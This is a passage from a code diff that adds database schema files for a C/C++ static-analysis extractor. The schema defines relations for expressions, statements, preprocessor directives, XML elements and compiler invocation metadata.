+@decrement_expr = @predecrexpr | @postdecrexpr;
+
+@crement_expr = @increment_expr | @decrement_expr;
+
+@un_arith_op_expr = @arithnegexpr
+ | @unaryplusexpr
+ | @conjugation
+ | @realpartexpr
+ | @imagpartexpr
+ | @crement_expr
+ ;
+
+@un_bitwise_op_expr = @complementexpr;
+
+@un_log_op_expr = @notexpr;
+
+@un_op_expr = @address_of
+ | @indirect
+ | @un_arith_op_expr
+ | @un_bitwise_op_expr
+ | @builtinaddressof
+ | @vec_fill
+ | @un_log_op_expr
+ | @co_await
+ | @co_yield
+ ;
+
+@bin_log_op_expr = @andlogicalexpr
| @orlogicalexpr;
+
+@cmp_op_expr = @eq_op_expr | @rel_op_expr;
+
+@eq_op_expr = @eqexpr | @neexpr;
+
+@rel_op_expr = @gtexpr
+ | @ltexpr
+ | @geexpr
+ | @leexpr
+ | @spaceshipexpr
+ ;
+
+@bin_bitwise_op_expr = @lshiftexpr
+ | @rshiftexpr
+ | @andexpr
+ | @orexpr
+ | @xorexpr
+ ;
+
+@p_arith_op_expr = @paddexpr
+ | @psubexpr
+ | @pdiffexpr
+ ;
+
+@bin_arith_op_expr = @addexpr
+ | @subexpr
+ | @mulexpr
+ | @divexpr
+ | @remexpr
+ | @jmulexpr
+ | @jdivexpr
+ | @fjaddexpr
+ | @jfaddexpr
+ | @fjsubexpr
+ | @jfsubexpr
+ | @minexpr
+ | @maxexpr
+ | @p_arith_op_expr
+ ;
+
+@bin_op_expr = @bin_arith_op_expr
+ | @bin_bitwise_op_expr
+ | @cmp_op_expr
+ | @bin_log_op_expr
+ ;
+
+@op_expr = @un_op_expr
+ | @bin_op_expr
+ | @assign_expr
+ | @conditionalexpr
+ ;
+
+@assign_arith_expr = @assignaddexpr
+ | @assignsubexpr
+ | @assignmulexpr
+ | @assigndivexpr
+ | @assignremexpr
+ ;
+
+@assign_bitwise_expr = @assignandexpr
+ | @assignorexpr
+ | @assignxorexpr
+ | @assignlshiftexpr
+ | @assignrshiftexpr
+ ;
+
+@assign_pointer_expr = @assignpaddexpr
+ | @assignpsubexpr
+ ;
+
+@assign_op_expr = @assign_arith_expr
+ | @assign_bitwise_expr
+ | @assign_pointer_expr
+ ;
+
+@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr
+
+/*
+ Binary encoding of the allocator form.
+
+ case @allocator.form of
+ 0 = plain
+ | 1 = alignment
+ ;
+*/
+
+/**
+ * The allocator function associated with a `new` or `new[]` expression.
+ * The `form` column specified whether the allocation call contains an alignment
+ * argument.
+ */
+expr_allocator(
+ unique int expr: @any_new_expr ref,
+ int func: @function ref,
+ int form: int ref
+);
+
+/*
+ Binary encoding of the deallocator form.
+
+ case @deallocator.form of
+ 0 = plain
+ | 1 = size
+ | 2 = alignment
+ | 4 = destroying_delete
+ ;
+*/
+
+/**
+ * The deallocator function associated with a `delete`, `delete[]`, `new`, or
+ * `new[]` expression.
For a `new` or `new[]` expression, the deallocator is the
+ * one used to free memory if the initialization throws an exception.
+ * The `form` column specifies whether the deallocation call contains a size
+ * argument, and alignment argument, or both.
+ */
+expr_deallocator(
+ unique int expr: @new_or_delete_expr ref,
+ int func: @function ref,
+ int form: int ref
+);
+
+/**
+ * Holds if the `@conditionalexpr` is of the two operand form
+ * `guard ? : false`.
+ */
+expr_cond_two_operand(
+ unique int cond: @conditionalexpr ref
+);
+
+/**
+ * The guard of `@conditionalexpr` `guard ? true : false`
+ */
+expr_cond_guard(
+ unique int cond: @conditionalexpr ref,
+ int guard: @expr ref
+);
+
+/**
+ * The expression used when the guard of `@conditionalexpr`
+ * `guard ? true : false` holds. For the two operand form
+ * `guard ?: false` consider using `expr_cond_guard` instead.
+ */
+expr_cond_true(
+ unique int cond: @conditionalexpr ref,
+ int true: @expr ref
+);
+
+/**
+ * The expression used when the guard of `@conditionalexpr`
+ * `guard ? true : false` does not hold.
+ */
+expr_cond_false(
+ unique int cond: @conditionalexpr ref,
+ int false: @expr ref
+);
+
+/** A string representation of the value. */
+values(
+ unique int id: @value,
+ string str: string ref
+);
+
+/** The actual text in the source code for the value, if any.
*/
+valuetext(
+ unique int id: @value ref,
+ string text: string ref
+);
+
+valuebind(
+ int val: @value ref,
+ unique int expr: @expr ref
+);
+
+fieldoffsets(
+ unique int id: @variable ref,
+ int byteoffset: int ref,
+ int bitoffset: int ref
+);
+
+bitfield(
+ unique int id: @variable ref,
+ int bits: int ref,
+ int declared_bits: int ref
+);
+
+/* TODO
+memberprefix(
+ int member: @expr ref,
+ int prefix: @expr ref
+);
+*/
+
+/*
+ kind(1) = mbrcallexpr
+ kind(2) = mbrptrcallexpr
+ kind(3) = mbrptrmbrcallexpr
+ kind(4) = ptrmbrptrmbrcallexpr
+ kind(5) = mbrreadexpr // x.y
+ kind(6) = mbrptrreadexpr // p->y
+ kind(7) = mbrptrmbrreadexpr // x.*pm
+ kind(8) = mbrptrmbrptrreadexpr // x->*pm
+ kind(9) = staticmbrreadexpr // static x.y
+ kind(10) = staticmbrptrreadexpr // static p->y
+*/
+/* TODO
+memberaccess(
+ int member: @expr ref,
+ int kind: int ref
+);
+*/
+
+initialisers(
+ unique int init: @initialiser,
+ int var: @accessible ref,
+ unique int expr: @expr ref,
+ int location: @location_default ref
+);
+
+braced_initialisers(
+ int init: @initialiser ref
+);
+
+/**
+ * An ancestor for the expression, for cases in which we cannot
+ * otherwise find the expression's parent.
+ */
+expr_ancestor(
+ int exp: @expr ref,
+ int ancestor: @element ref
+);
+
+exprs(
+ unique int id: @expr,
+ int kind: int ref,
+ int location: @location_default ref
+);
+
+expr_reuse(
+ int reuse: @expr ref,
+ int original: @expr ref,
+ int value_category: int ref
+)
+
+/*
+ case @value.category of
+ 1 = prval
+ | 2 = xval
+ | 3 = lval
+ ;
+*/
+expr_types(
+ int id: @expr ref,
+ int typeid: @type ref,
+ int value_category: int ref
+);
+
+case @expr.kind of
+ 1 = @errorexpr
+| 2 = @address_of // & AddressOfExpr
+| 3 = @reference_to // ReferenceToExpr (implicit?)
+| 4 = @indirect // * PointerDereferenceExpr
+| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?)
+// ...
+| 8 = @array_to_pointer // (???)
+| 9 = @vacuous_destructor_call // VacuousDestructorCall
+// ...
+| 11 = @assume // Microsoft
+| 12 = @parexpr
+| 13 = @arithnegexpr
+| 14 = @unaryplusexpr
+| 15 = @complementexpr
+| 16 = @notexpr
+| 17 = @conjugation // GNU ~ operator
+| 18 = @realpartexpr // GNU __real
+| 19 = @imagpartexpr // GNU __imag
+| 20 = @postincrexpr
+| 21 = @postdecrexpr
+| 22 = @preincrexpr
+| 23 = @predecrexpr
+| 24 = @conditionalexpr
+| 25 = @addexpr
+| 26 = @subexpr
+| 27 = @mulexpr
+| 28 = @divexpr
+| 29 = @remexpr
+| 30 = @jmulexpr // C99 mul imaginary
+| 31 = @jdivexpr // C99 div imaginary
+| 32 = @fjaddexpr // C99 add real + imaginary
+| 33 = @jfaddexpr // C99 add imaginary + real
+| 34 = @fjsubexpr // C99 sub real - imaginary
+| 35 = @jfsubexpr // C99 sub imaginary - real
+| 36 = @paddexpr // pointer add (pointer + int or int + pointer)
+| 37 = @psubexpr // pointer sub (pointer - integer)
+| 38 = @pdiffexpr // difference between two pointers
+| 39 = @lshiftexpr
+| 40 = @rshiftexpr
+| 41 = @andexpr
+| 42 = @orexpr
+| 43 = @xorexpr
+| 44 = @eqexpr
+| 45 = @neexpr
+| 46 = @gtexpr
+| 47 = @ltexpr
+| 48 = @geexpr
+| 49 = @leexpr
+| 50 = @minexpr // GNU minimum
+| 51 = @maxexpr // GNU maximum
+| 52 = @assignexpr
+| 53 = @assignaddexpr
+| 54 = @assignsubexpr
+| 55 = @assignmulexpr
+| 56 = @assigndivexpr
+| 57 = @assignremexpr
+| 58 = @assignlshiftexpr
+| 59 = @assignrshiftexpr
+| 60 = @assignandexpr
+| 61 = @assignorexpr
+| 62 = @assignxorexpr
+| 63 = @assignpaddexpr // assign pointer add
+| 64 = @assignpsubexpr // assign pointer sub
+| 65 = @andlogicalexpr
+| 66 = @orlogicalexpr
+| 67 = @commaexpr
+| 68 = @subscriptexpr // access to member of an array, e.g., a[5]
+// ... 69 @objc_subscriptexpr deprecated
+// ... 70 @cmdaccess deprecated
+// ...
+| 73 = @virtfunptrexpr
+| 74 = @callexpr
+// ... 75 @msgexpr_normal deprecated
+// ... 76 @msgexpr_super deprecated
+// ... 77 @atselectorexpr deprecated
+// ... 78 @atprotocolexpr deprecated
+| 79 = @vastartexpr
+| 80 = @vaargexpr
+| 81 = @vaendexpr
+| 82 = @vacopyexpr
+// ...
83 @atencodeexpr deprecated
+| 84 = @varaccess
+| 85 = @thisaccess
+// ... 86 @objc_box_expr deprecated
+| 87 = @new_expr
+| 88 = @delete_expr
+| 89 = @throw_expr
+| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2)
+| 91 = @braced_init_list
+| 92 = @type_id
+| 93 = @runtime_sizeof
+| 94 = @runtime_alignof
+| 95 = @sizeof_pack
+| 96 = @expr_stmt // GNU extension
+| 97 = @routineexpr
+| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....)
+| 99 = @offsetofexpr // offsetof ::= type and field
+| 100 = @hasassignexpr // __has_assign ::= type
+| 101 = @hascopyexpr // __has_copy ::= type
+| 102 = @hasnothrowassign // __has_nothrow_assign ::= type
+| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type
+| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type
+| 105 = @hastrivialassign // __has_trivial_assign ::= type
+| 106 = @hastrivialconstr // __has_trivial_constructor ::= type
+| 107 = @hastrivialcopy // __has_trivial_copy ::= type
+| 108 = @hasuserdestr // __has_user_destructor ::= type
+| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type
+| 110 = @isabstractexpr // __is_abstract ::= type
+| 111 = @isbaseofexpr // __is_base_of ::= type type
+| 112 = @isclassexpr // __is_class ::= type
+| 113 = @isconvtoexpr // __is_convertible_to ::= type type
+| 114 = @isemptyexpr // __is_empty ::= type
+| 115 = @isenumexpr // __is_enum ::= type
+| 116 = @ispodexpr // __is_pod ::= type
+| 117 = @ispolyexpr // __is_polymorphic ::= type
+| 118 = @isunionexpr // __is_union ::= type
+| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type
+| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof
+// ...
+| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type
+| 123 = @literal
+| 124 = @uuidof
+| 127 = @aggregateliteral
+| 128 = @delete_array_expr
+| 129 = @new_array_expr
+// ... 130 @objc_array_literal deprecated
+// ...
131 @objc_dictionary_literal deprecated
+| 132 = @foldexpr
+// ...
+| 200 = @ctordirectinit
+| 201 = @ctorvirtualinit
+| 202 = @ctorfieldinit
+| 203 = @ctordelegatinginit
+| 204 = @dtordirectdestruct
+| 205 = @dtorvirtualdestruct
+| 206 = @dtorfielddestruct
+// ...
+| 210 = @static_cast
+| 211 = @reinterpret_cast
+| 212 = @const_cast
+| 213 = @dynamic_cast
+| 214 = @c_style_cast
+| 215 = @lambdaexpr
+| 216 = @param_ref
+| 217 = @noopexpr
+// ...
+| 294 = @istriviallyconstructibleexpr
+| 295 = @isdestructibleexpr
+| 296 = @isnothrowdestructibleexpr
+| 297 = @istriviallydestructibleexpr
+| 298 = @istriviallyassignableexpr
+| 299 = @isnothrowassignableexpr
+| 300 = @istrivialexpr
+| 301 = @isstandardlayoutexpr
+| 302 = @istriviallycopyableexpr
+| 303 = @isliteraltypeexpr
+| 304 = @hastrivialmoveconstructorexpr
+| 305 = @hastrivialmoveassignexpr
+| 306 = @hasnothrowmoveassignexpr
+| 307 = @isconstructibleexpr
+| 308 = @isnothrowconstructibleexpr
+| 309 = @hasfinalizerexpr
+| 310 = @isdelegateexpr
+| 311 = @isinterfaceclassexpr
+| 312 = @isrefarrayexpr
+| 313 = @isrefclassexpr
+| 314 = @issealedexpr
+| 315 = @issimplevalueclassexpr
+| 316 = @isvalueclassexpr
+| 317 = @isfinalexpr
+| 319 = @noexceptexpr
+| 320 = @builtinshufflevector
+| 321 = @builtinchooseexpr
+| 322 = @builtinaddressof
+| 323 = @vec_fill
+| 324 = @builtinconvertvector
+| 325 = @builtincomplex
+| 326 = @spaceshipexpr
+| 327 = @co_await
+| 328 = @co_yield
+| 329 = @temp_init
+| 330 = @isassignable
+| 331 = @isaggregate
+| 332 = @hasuniqueobjectrepresentations
+| 333 = @builtinbitcast
+| 334 = @builtinshuffle
+| 335 = @blockassignexpr
+| 336 = @issame
+| 337 = @isfunction
+| 338 = @islayoutcompatible
+| 339 = @ispointerinterconvertiblebaseof
+| 340 = @isarray
+| 341 = @arrayrank
+| 342 = @arrayextent
+| 343 = @isarithmetic
+| 344 = @iscompletetype
+| 345 = @iscompound
+| 346 = @isconst
+| 347 = @isfloatingpoint
+| 348 = @isfundamental
+| 349 = @isintegral
+| 350 = @islvaluereference
+| 351 =
@ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr 
+ | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + 
+new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + 
boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 
34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int 
for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: 
@preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata -*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: 
@file ref
+);
+
+@xmlparent = @file | @xmlelement;
+@xmlnamespaceable = @xmlelement | @xmlattribute;
+
+xmllocations(
+ int xmlElement: @xmllocatable ref,
+ int location: @location_default ref
+);
+
+@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace;
diff --git a/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme
new file mode 100644
index 000000000000..ef8d209a22e2
--- /dev/null
+++ b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/semmlecode.cpp.dbscheme
@@ -0,0 +1,2577 @@
+
+/*- Compilations -*/
+
+/**
+ * An invocation of the compiler. Note that more than one file may be
+ * compiled per invocation. For example, this command compiles three
+ * source files:
+ *
+ * gcc -c f1.c f2.c f3.c
+ *
+ * The `id` simply identifies the invocation, while `cwd` is the working
+ * directory from which the compiler was invoked.
+ */
+compilations(
+ /**
+ * An invocation of the compiler. Note that more than one file may
+ * be compiled per invocation. For example, this command compiles
+ * three source files:
+ *
+ * gcc -c f1.c f2.c f3.c
+ */
+ unique int id : @compilation,
+ string cwd : string ref
+);
+
+/**
+ * The arguments that were passed to the extractor for a compiler
+ * invocation. If `id` is for the compiler invocation
+ *
+ * gcc -c f1.c f2.c f3.c
+ *
+ * then typically there will be rows for
+ *
+ * num | arg
+ * --- | ---
+ * 0 | *path to extractor*
+ * 1 | `--mimic`
+ * 2 | `/usr/bin/gcc`
+ * 3 | `-c`
+ * 4 | f1.c
+ * 5 | f2.c
+ * 6 | f3.c
+ */
+#keyset[id, num]
+compilation_args(
+ int id : @compilation ref,
+ int num : int ref,
+ string arg : string ref
+);
+
+/**
+ * The expanded arguments that were passed to the extractor for a
+ * compiler invocation. This is similar to `compilation_args`, but
+ * for a `@someFile` argument, it includes the arguments from that
+ * file, rather than just taking the argument literally.
+ */
+#keyset[id, num]
+compilation_expanded_args(
+ int id : @compilation ref,
+ int num : int ref,
+ string arg : string ref
+);
+
+/**
+ * Optionally, record the build mode for each compilation.
+ */
+compilation_build_mode(
+ unique int id : @compilation ref,
+ int mode : int ref
+);
+
+/*
+case @compilation_build_mode.mode of
+ 0 = @build_mode_none
+| 1 = @build_mode_manual
+| 2 = @build_mode_auto
+;
+*/
+
+/**
+ * The source files that are compiled by a compiler invocation.
+ * If `id` is for the compiler invocation
+ *
+ * gcc -c f1.c f2.c f3.c
+ *
+ * then there will be rows for
+ *
+ * num | arg
+ * --- | ---
+ * 0 | f1.c
+ * 1 | f2.c
+ * 2 | f3.c
+ *
+ * Note that even if those files `#include` headers, those headers
+ * do not appear as rows.
+ */
+#keyset[id, num]
+compilation_compiling_files(
+ int id : @compilation ref,
+ int num : int ref,
+ int file : @file ref
+);
+
+/**
+ * The time taken by the extractor for a compiler invocation.
+ *
+ * For each file `num`, there will be rows for
+ *
+ * kind | seconds
+ * ---- | ---
+ * 1 | CPU seconds used by the extractor frontend
+ * 2 | Elapsed seconds during the extractor frontend
+ * 3 | CPU seconds used by the extractor backend
+ * 4 | Elapsed seconds during the extractor backend
+ */
+#keyset[id, num, kind]
+compilation_time(
+ int id : @compilation ref,
+ int num : int ref,
+ /* kind:
+ 1 = frontend_cpu_seconds
+ 2 = frontend_elapsed_seconds
+ 3 = extractor_cpu_seconds
+ 4 = extractor_elapsed_seconds
+ */
+ int kind : int ref,
+ float seconds : float ref
+);
+
+/**
+ * An error or warning generated by the extractor.
+ * The diagnostic message `diagnostic` was generated during compiler
+ * invocation `compilation`, and is the `file_number_diagnostic_number`th
+ * message generated while extracting the `file_number`th file of that
+ * invocation.
+ */
+#keyset[compilation, file_number, file_number_diagnostic_number]
+diagnostic_for(
+ int diagnostic : @diagnostic ref,
+ int compilation : @compilation ref,
+ int file_number : int ref,
+ int file_number_diagnostic_number : int ref
+);
+
+/**
+ * If extraction was successful, then `cpu_seconds` and
